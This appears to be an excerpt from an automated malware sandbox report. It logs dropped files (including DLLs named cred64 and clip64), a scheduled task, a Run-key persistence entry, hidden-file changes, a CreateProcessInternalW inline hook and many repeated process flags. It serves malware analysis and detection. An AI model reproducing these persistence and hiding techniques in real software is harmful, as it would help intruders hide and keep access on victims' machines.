Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	File created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\_lzma.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe

File created: C:\Windows\Tasks\Gxtuum.job

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services			Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Changes the view of files in windows explorer (hidden files and folders)

Source: C:\Windows\System32\audiodg.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F

Source: C:\Windows\explorer.exe

Code function: 4_2_09825590 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_09825590

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
